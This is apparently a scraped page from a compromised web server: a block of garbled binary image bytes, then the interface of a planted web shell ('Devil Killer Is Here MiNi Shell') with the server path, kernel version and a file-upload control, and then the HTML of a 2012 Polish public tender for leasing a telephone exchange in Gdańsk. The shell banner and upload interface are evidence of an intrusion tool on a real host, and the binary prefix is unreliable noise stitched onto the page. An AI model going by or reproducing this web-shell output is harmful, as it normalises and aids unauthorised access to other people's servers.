JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120306/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120306/68564-N-2012.html

<p class="kh_header"><b>Gdańsk: Przedmiotem zamówienia jest dzierżawa centrali telefonicznej i aparatów telefonicznych oraz świadczenie usług telekomunikacyjnych.</b><br>
<b>Numer ogłoszenia: 68564 - 2012; data zamieszczenia: 06.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samorząd Województwa Pomorskiego , ul. Okopowa 21/27, 80-810 Gdańsk, woj. pomorskie, tel. 058 3261555, faks 058 3261556.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pomorskie.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest dzierżawa centrali telefonicznej i aparatów telefonicznych oraz świadczenie usług telekomunikacyjnych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dzierżawa centrali telefonicznej i aparatów telefonicznych oraz świadczenie usług telekomunikacyjnych dla Urzędu Marszałkowskiego Województwa Pomorskiego w Gdańsku.
1.	Przedmiotem zamówienia nazywanym dalej Systemem Telekomunikacyjnym jest:
1)	dzierżawa biurowej, cyfrowej centrali telefonicznej wraz z wyposażeniem dodatkowym nazywanej dalej Centralą,
2)	dzierżawa cyfrowych aparatów telefonicznych nazywanych dalej Telefonami,
3)	dzierżawa przełączników 48 oraz 24 portowych PoE nazywanych dalej Przełącznikami,
4)	transport, montaż i uruchomienie przedmiotu zamówienia,
5)	usługa podłączenia Centrali z krajową siecią telekomunikacyjną,
6)	dzierżawa wraz z instalacją i konfiguracją oprogramowania do obsługi faksów, współpracującego z Centralą,
7)	usługi telefoniczne świadczone za pomocą Centrali,
8)	pozostałe usługi telefonii stacjonarnej.
2.	Szczegółowy opis przedmiotu zamówienia, o którym mowa w ust. 1 stanowi załącznik nr 2 do SIWZ - Specyfikacja zamówienia. Parametry techniczne i ilości podane w załączniku nr 2 do SIWZ stanowią minimalne wymagania Zamawiającego, jakie musi spełniać przedmiot zamówienia.
3.	Kod Wspólnego Słownika Zamówień (CPV): 
	32552310-3 - Cyfrowe centrale telefoniczne
	32546000-2 - Cyfrowe wyposażenie centrali
	32551300-3 - Telefoniczne zestawy słuchawkowe
	64200000-8 - Usługi telekomunikacyjne,
	64210000-1 - Usługi telefoniczne i przesyłu danych
	64211100-9 - Usługi telefonii lokalnej
	64214200-1 - Usługi centrali telefonicznych
4.	Przedmiot zamówienia będzie realizowany na podstawie umowy, której warunki określa 	załącznik nr 5 do SIWZ - Wzór umowy, nazywanej dalej Umową. 
5.	Uruchomienie Systemu Telekomunikacyjnego zostanie potwierdzone protokołem odbioru prac. 	Podpisany przez obie strony zamówienia protokół będzie stanowił podstawę do rozpoczęcia naliczania opłat przez Wykonawcę, nie wcześniej jednak niż od dnia 20.05.2012 r., zgodnie z 	podpisaną Umową.
6.	Wykonawca będzie świadczył usługi dzierżawy, o których mowa w ust. 1 pkt 1, 2, 3, 6 oraz 	usługi, o których mowa  w ust. 1 pkt 5, 7 i 8 od dnia 20.05.2012 r. (z zastrzeżeniem 	podpisania protokołu odbioru prac, o którym mowa w ust. 5) do dnia 30.04.2015 r.
7.	Oferowany przedmiot zamówienia, o którym mowa w ust. 1 pkt 1, 2, 6 nie musi być 	fabrycznie nowy, musi być jednak wolny od wszelkich wad i uszkodzeń i nie może być wyprodukowany przed 01.07.2006 r. Oferowany przedmiot zamówienia, o którym mowa 	w ust. 1 pkt 3 musi być fabrycznie nowy, musi być wolny od wszelkich wad i uszkodzeń i 	nie może być wyprodukowany przed 01.06.2011 r.
8.	Wykonawca zobowiązany jest dołączyć do oferty wykaz sprzętu i oprogramowania będących 	przedmiotem dzierżawy, o którym mowa w ust. 1 pkt 1, 2, 3, 6  - którego wzór określa 	załącznik nr 1c do SIWZ.
9.	Warunki transportu, montażu i uruchomienia przedmiotu zamówienia opisane zostały w 	załączniku nr 2 do SIWZ.
10.	Do każdego dzierżawionego urządzenia musi być dostarczony minimum jeden komplet 	standardowej dokumentacji dla użytkownika w formie papierowej lub elektronicznej.
11.	Zamawiający nie dopuszcza składania ofert zawierających sprzęt będący w zapowiedziach 	producentów, który na rynku (krajowym lub zagranicznym) będzie dostępny dopiero po 	terminie składania ofert. 
12.	Wykonawca zapewni w siedzibie Zamawiającego przeszkolenie wskazanych pracowników w 	zakresie obsługi i administrowania oferowanym Systemem Telekomunikacyjnym (minimum dwa razy po 8 godzin).
13.	Wykonawca zobowiązuje się wykonać wszystkie prace związane z instalacją, konfiguracją i 	uruchomieniem Systemu Telekomunikacyjnego zgodnie z obowiązującymi przepisami BHP i p. 	poż, ochrony środowiska oraz wytycznymi dotyczącymi wykonywania i odbioru instalacji 	elektrycznych i teletechnicznych.
14.	Zamawiający zapewni odpowiednie pomieszczenia na potrzeby instalacji Systemu 	Telekomunikacyjnego wraz z zasilaniem elektrycznym oraz klimatyzacją. Pomieszczenia, w 	których będzie znajdował się System Telekomunikacyjny będą zabezpieczone instalacją 	alarmową i drzwiami antywłamaniowymi. Zamawiający pokryje koszty zużycia energii elektrycznej funkcjonowania Systemu Telekomunikacyjnego. Zamawiający zobowiązuje się udostępnić własną infrastrukturę teleinformatyczną niezbędną do realizacji przedmiotu zamówienia.
15.	Wykonawca zapewni ciągłość pracy oferowanego Systemu Telekomunikacyjnego we wszystkie 	dni w roku, 24 godziny na dobę, przez cały okres, o którym mowa w rozdz. IV.
16.	W przypadku wystąpienia awarii lub usterki Systemu Telekomunikacyjnego Wykonawca lub 	wyznaczony przez niego autoryzowany serwis zobowiązuje się do podjęcia naprawy (sprzętu i oprogramowania) na miejscu, w siedzibie Zamawiającego, najdalej w czwartej godzinie od momentu przyjęcia zgłoszenia telefonicznego, faksowego lub za pomocą wiadomości e-mail.
17.	Wykonawca (lub wyznaczony przez niego autoryzowany serwis) jest zobowiązany do 	całkowitego usunięcia awarii (lub usterki) sprzętu lub oprogramowania nie później niż w ciągu 24 godzin od chwili przyjęcia zgłoszenia. W przypadku gdy naprawa będzie niemożliwa do 	wykonania w tym terminie, Wykonawca następnego dnia kalendarzowego po upływie tego 	terminu dostarczy Zamawiającemu sprzęt zastępczy o takim samym standardzie i funkcjonalności oraz zainstaluje odpowiednie dla niego oprogramowanie - do czasu zakończenia naprawy.
18.	W przypadku, gdy naprawa urządzenia potrwa dłużej niż 4 tygodnie lub, gdy urządzenie 	będzie naprawiane trzykrotnie podczas okresu gwarancyjnego, Wykonawca wymieni na własny koszt naprawiane urządzenie na takie samo lub inne, uzgodnione z Zamawiającym, o 	co najmniej takich samych parametrach, funkcjonalności i standardzie.
19.	Prace związane z instalacją i konfiguracją Systemu Telekomunikacyjnego będą prowadzone w terminach i godzinach określonych przez Zamawiającego, w przedziale między godziną 6.00 a 22.00 we wszystkie dni tygodnia.
20.	Wynagrodzenie za usługi, o których mowa w ust. 1 pkt 1, 2, 3, 5, 6 oraz za abonamenty 	dotyczące dostępów ISDN, o których mowa w ust. 1 pkt 8 będzie rozliczane z góry na 	początku każdego okresu rozliczeniowego. Wynagrodzenie za usługi, o których mowa w ust. 1 pkt 7 oraz za połączenia realizowane za pomocą linii ISDN, o których mowa w ust. 1 	pkt 8, będzie rozliczane każdorazowo po upływie okresu, nazywanego dalej Okresem Rozliczeniowym, liczonego od pierwszego do ostatniego dnia każdego miesiąca, z zastrzeżeniem ust. 21 i 22. 
21.	Pierwszy Okres Rozliczeniowy będzie liczony od dnia 20.05.2012 r. (z zastrzeżeniem 	podpisania protokołu odbioru prac, o którym mowa ust. 5) do ostatniego dnia miesiąca.
22.	W ostatnim miesiącu realizacji Umowy Okres Rozliczeniowy będzie liczony od pierwszego dnia miesiąca do dnia 30.04.2015 r.
23.	Za świadczenie usług dzierżawy, o których mowa ust. 1 pkt 1, 2, 3, 6  Wykonawca otrzyma 	wynagrodzenie, równe sumie kosztów tych usług, rozłożone na 36 równych, misięcznych rat. 	Wartość miesięcznej raty netto będzie zgodna z ofertą Wykonawcy, podaną w polu 1b tabeli 	formularza Szczegółowe warunki oferty,którego wzór stanowi załącznik nr 1b do SIWZ. 
24.	Wynagrodzenie za świadczenie usług, o których mowa w ust. 1 pkt 4 nie będzie płatne przez 	Zamawiającego oddzielnie, Wykonawca uwzględni je w kosztach świadczenia usług dzierżawy,  	o których mowa w ust. 1 pkt 1.
25.	Za świadczenie usług, o których mowa ust. 1 pkt 5 Wykonawca otrzyma wynagrodzenie, w 	postaci miesięcznych abonamentów. Wartość miesięcznych abonamentów netto będzie 	zgodna z ofertą Wykonawcy, podaną w polu 2b tabeli formularza Szczegółowe warunki oferty, którego wzór stanowi załącznik nr 1b do SIWZ. 
26.	Za świadczenie usług telefonicznych, o których mowa ust. 1 pkt 7 i 8  Wykonawca otrzyma wynagrodzenie, płatne na podstawie wykazów (tzw. bilingów) każdorazowo po upływie Okresu Rozliczeniowego zawierających miesięczne koszty świadczenia usług przez Wykonawcę 	na rzecz Zamawiającego.  Koszt jednostkowy netto za:
1)	minutę połączenia wewnątrzstrefowego (lokalnego) będzie zgodny z ofertą 	Wykonawcy, podaną w polu 4b, 
2)	minutę połączenia międzystrefowego krajowego będzie zgodny z ofertą Wykonawcy, podaną w polu 5b, 
3)	minutę połączenia międzystrefowego międzynarodowego do krajów Unii Europejskiej będzie zgodny z ofertą Wykonawcy, podaną w polu 6b, 
	tabeli formularza Szczegółowe warunki oferty, którego wzór stanowi załącznik nr 1b do 	SIWZ. 
27.	Za świadczenie usług za użytkowanie numerów miejskich poprzez trakty ISDN 2B+D, o których mowa ust. 1 pkt 8 Wykonawca otrzyma wynagrodzenie, w postaci miesięcznych abonamentów. Wartość miesięcznych abonamentów netto będzie zgodna z ofertą 	Wykonawcy, podaną w polu 3b tabeli formularza Szczegółowe warunki oferty, którego 	wzór stanowi załącznik nr 1b do SIWZ.
28.	Płatności, o których mowa w ust. 23, 25 oraz abonamenty dotyczące dostępów ISDN, o 	których mowa w ust. 27 rozliczane będą z góry na początku każdego okresu rozliczeniowego w terminie 21 dni od daty wystawienia przez Wykonawcę prawidłowych faktur VAT. Płatności za usługi, o których mowa w ust. 26 oraz za połączenia realizowane za pomocą linii ISDN, o których mowa w ust. 27 będą rozliczane każdorazowo po upływie okresu rozliczeniowego w 	terminie 21 dni od daty wystawienia przez Wykonawcę prawidłowych faktur VAT. W przypadku, gdy Wykonawca nie dostarczy prawidłowo wystawionych faktur VAT na 14 dni przed upływem terminu płatności, termin płatności wskazany w fakturach zostanie automatycznie przedłużony o czas opóźnienia.
29.	Wszelkie dodatkowe koszty związane z transportem, montażem i uruchomieniem Systemu Telekomunikacyjnego (w tym koszty dodatkowego wyposażenia, licencji, szkoleń, itp.), które nie wykazane zostały w innych pozycjach SIWZ Wykonawca doliczy do ceny usług dzierżawy, 	o których mowa ust. 1 pkt 1, 2, 3, 6 i doda w polu 1b tabeli formularza Szczegółowe warunki 	oferty, którego wzór stanowi załącznik nr 1b do SIWZ.
30.	Zamawiający będzie powiadamiał Wykonawcę o wszelkich nieprawidłowościach w pracy, usterkach czy uszkodzeniach przedmiotu dzierżawy, o którym mowa w ust. 1 pkt 1, 2, 3, 6.
31.	Wykonawca będzie miał prawo obciążyć Zamawiającego kosztami napraw przedmiotu dzierżawy, o którym mowa w ust. 1 pkt 1, 2, 3, 6 w przypadku stwierdzenia, że uszkodzenie powstało na skutek:
	1)	samowolnej ingerencji dokonanej przez Zamawiającego lub inne nieuprawnione 	osoby,
	2)	uszkodzeń mechanicznych, które nie mogły powstać w trakcie właściwej eksploatacji,
	3)	niepowiadomienia Wykonawcy o nieprawidłowościach w pracy, usterkach lub uszkodzeniach. 
32.	Zamawiający nie będzie dokonywał bez uzgodnienia z Wykonawcą zmian w przedmiocie 	dzierżawy, o którym mowa w ust. 1 pkt 1, 2, 3, 6 polegających na instalacji nowego, dodatkowego wyposażenia, oprogramowania lub zmianie konfiguracji.
33.	Zamawiający nie będzie przekazywał lub oddawał w najem, dzierżawę lub bezpłatne użytkowanie przedmiocie dzierżawy, o którym mowa w ust. 1 pkt 1, 2, 3, 6 bez zgody Wykonawcy.
34.	Sprzęt i oprogramowanie będące przedmiotem dzierżawy, o którym mowa w ust. 1 pkt 1, 2, 3, 6 będzie spełniał wymagania prawa telekomunikacyjnego.
35.	Zamawiający nie będzie odpowiadał za techniczne zużycie przedmiotu dzierżawy, o którym mowa w ust. 1 pkt 1, 2, 3, 6 wynikające z właściwej jego eksploatacji.
36.	Przez czas obowiązywania Umowy przedmiot dzierżawy, o którym mowa w ust. 1 pkt 1, 2, 3, 6 pozostaje własnością Wykonawcy, a po jej zakończeniu zostanie zwrócony w całości Wykonawcy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje dokonywanie zamówień uzupełniających. Przewiduje się udzielenie zamówienia uzupełniającego do zamówienia podstawowego Wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza. Powyższe będzie miało zastosowanie w przypadku, gdy Zamawiający będzie korzystał z usług tego samego rodzaju związanych z przedmiotem zamówienia, oraz w przypadku gdy Zamawiający zamówi do 20 dodatkowych miejskich linii cyfrowych ISDN 2B+D będących przedmiotem zamówienia, o którym mowa w ust. 1 pkt 8. Zamówienie uzupełniające nie może przekroczyć 2% wartości zamówienia 	podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 32.55.23.10-3, 32.54.60.00-2, 32.55.13.00-3, 64.20.00.00-8, 64.21.00.00-1, 64.21.10.00-9, 64.21.42.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2015.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający w niniejszym postępowaniu nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia wyżej wskazanego warunku nastąpi na podstawie przedstawionego przez Wykonawcę dokumentu, o którym mowa w rozdz. VI ust. 1 pkt 3 , tj. aktualny wpis do rejestru przedsiębiorców telekomunikacyjnych prowadzonego przez Prezesa Urzędu Komunikacji Elektronicznej (UKE), zgodnie z ustawą z dnia 16 lipca 2004 roku Prawo Telekomunikacyjne (Dz. U. z 2004r. Nr 171, poz. 1800 z późn. zm.) i oświadczenia, którego wzór stanowi załącznik nr 3a do SIWZ. Wymagane dokumenty na potwierdzenie tego warunku wskazano także w rozdziale III. 4.1) niniejszego ogłoszenia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na dowód posiadania wiedzy i doświadczenia - 	udokumentują należyte wykonanie w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 3 usług dzierżawy systemu telekomunikacyjnego (w skład którego wchodziła centrala telefoniczna, aparaty telefoniczne oraz usługi telekomunikacyjne obsługujące minimum 400 abonentów), w tym co najmniej jedna usługa dzierżawy systemu telekomunikacyjnego wykorzystującego technologię VoIP (minimum 400 abonentów korzystających z aparatów cyfrowych IP).
Ocena wykazania spełnienia warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów, o których mowa w rozdz. VI ust. 1 pkt 2 (wzór wykazu usług stanowi załącznik nr 4 do SIWZ) , oraz oświadczenia, o którym mowa  w rozdz. VI ust. 1 pkt 1 (wzór stanowi załącznik nr 3a do SIWZ).
Wymagane dokumenty na potwierdzenie tego warunku wskazano także  w rozdziale III. 4.1) niniejszego ogłoszenia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustala szczegółowego warunku w tym zakresie. 
Ocena spełnienia wyżej wskazanego warunku nastąpi na podstawie przedstawionego przez Wykonawcę oświadczenia, o którym mowa w rozdz. VI ust. 1 pkt 1 (wzór oświadczenia 	stanowi załącznik nr 3a do SIWZ) oraz o którym mowa  także w rozdziale III. 4.1) niniejszego ogłoszenia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustala szczegółowego warunku w tym zakresie. 
Ocena spełnienia wyżej wskazanego warunku nastąpi na podstawie przedstawionego przez Wykonawcę oświadczenia, o którym mowa w rozdz. VI ust. 1 pkt 1 (wzór oświadczenia 	stanowi załącznik nr 3a do SIWZ) oraz o którym mowa  także w rozdziale III. 4.1) niniejszego ogłoszenia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie ustala szczegółowego warunku w tym zakresie. 
Ocena spełnienia wyżej wskazanego warunku nastąpi na podstawie przedstawionego przez Wykonawcę oświadczenia, o którym mowa w rozdz. VI ust. 1 pkt 1 (wzór oświadczenia 	stanowi załącznik nr 3a do SIWZ) oraz o którym mowa  także w rozdziale III. 4.1) niniejszego ogłoszenia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Udział w postępowaniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia:
1) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego,
2)	każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia musi złożyć dokumenty, o których mowa w ust. 2 pkt 1-2,
3)	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia złożą łącznie formularz oferty oraz jeden komplet dokumentów, o których mowa w ust.	1 pkt 1-3. Dokumenty te powinny być przygotowane w taki sposób, aby zamawiający mógł dowiedzieć się, jaki udział w wykonaniu zamówienia będzie miał każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.
2. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w ust. 2 pkt 2 - składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. 
3. Dokumenty, o których mowa w ust. 2 powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
4. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ust. 2, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania. Do aktualności tego dokumentu mają odpowiednie zastosowanie zapisy ust.  3.
5. Dokumenty sporządzone w języku obcym będą składane wraz z tłumaczeniem na język polski, poświadczonym przez Wykonawcę.
